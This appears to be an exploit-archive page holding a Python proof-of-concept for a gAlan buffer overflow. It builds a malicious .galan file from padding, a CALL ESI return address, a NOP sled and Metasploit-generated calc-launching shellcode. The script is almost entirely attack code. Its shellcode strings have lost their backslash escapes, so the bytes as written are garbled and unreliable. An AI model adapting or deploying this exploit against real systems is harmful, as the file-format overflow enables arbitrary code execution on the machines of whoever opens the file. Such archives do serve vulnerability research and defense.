[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : gAlan (.galan file) Universal Buffer Overflow Exploit
# Published : 2009-12-07
# Author : Dz_attacker
# Previous Title : Adobe Illustrator CS4 v14.0.0 eps Universal Buffer Overflow (meta)
# Next Title : gAlan 0.2.1 Universal Buffer Overflow Exploit (meta)
#!/usr/bin/python
# gAlan (.galan file) Universal Buffer Overflow Exploit
# Author : Dz_Attacker
# Mail : dz_attacker@hotmail.fr
# Original : http://www.exploit-db.com/exploits/10339
# win32_exec - EXITFUNC=process CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
shellcode=(
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x54"
"x42x30x42x30x42x30x4bx58x45x44x4ex33x4bx48x4ex57"
"x45x50x4ax57x41x50x4fx4ex4bx48x4fx34x4ax41x4bx58"
"x4fx55x42x42x41x30x4bx4ex49x54x4bx48x46x33x4bx38"
"x41x30x50x4ex41x53x42x4cx49x39x4ex4ax46x38x42x4c"
"x46x57x47x30x41x4cx4cx4cx4dx50x41x50x44x4cx4bx4e"
"x46x4fx4bx43x46x45x46x52x46x30x45x37x45x4ex4bx38"
"x4fx55x46x42x41x30x4bx4ex48x46x4bx38x4ex30x4bx54"
"x4bx38x4fx35x4ex51x41x30x4bx4ex4bx48x4ex51x4bx38"
"x41x50x4bx4ex49x58x4ex55x46x42x46x30x43x4cx41x53"
"x42x4cx46x56x4bx48x42x44x42x43x45x58x42x4cx4ax37"
"x4ex50x4bx48x42x54x4ex30x4bx48x42x47x4ex41x4dx4a"
"x4bx58x4ax46x4ax30x4bx4ex49x50x4bx58x42x48x42x4b"
"x42x50x42x30x42x30x4bx58x4ax56x4ex33x4fx45x41x33"
"x48x4fx42x46x48x45x49x48x4ax4fx43x58x42x4cx4bx47"
"x42x35x4ax46x50x47x4ax4dx44x4ex43x37x4ax46x4ax49"
"x50x4fx4cx38x50x50x47x55x4fx4fx47x4ex43x46x41x46"
"x4ex56x43x36x42x50x5a")
payload = "Mjik"
payload += "x41"*1028
payload += "xd0x75x01x10" #glib-1_3: CALL ESI
payload += "x90"*45
payload += shellcode
file = open("exploit.galan","w")
file.write(payload)
file.close()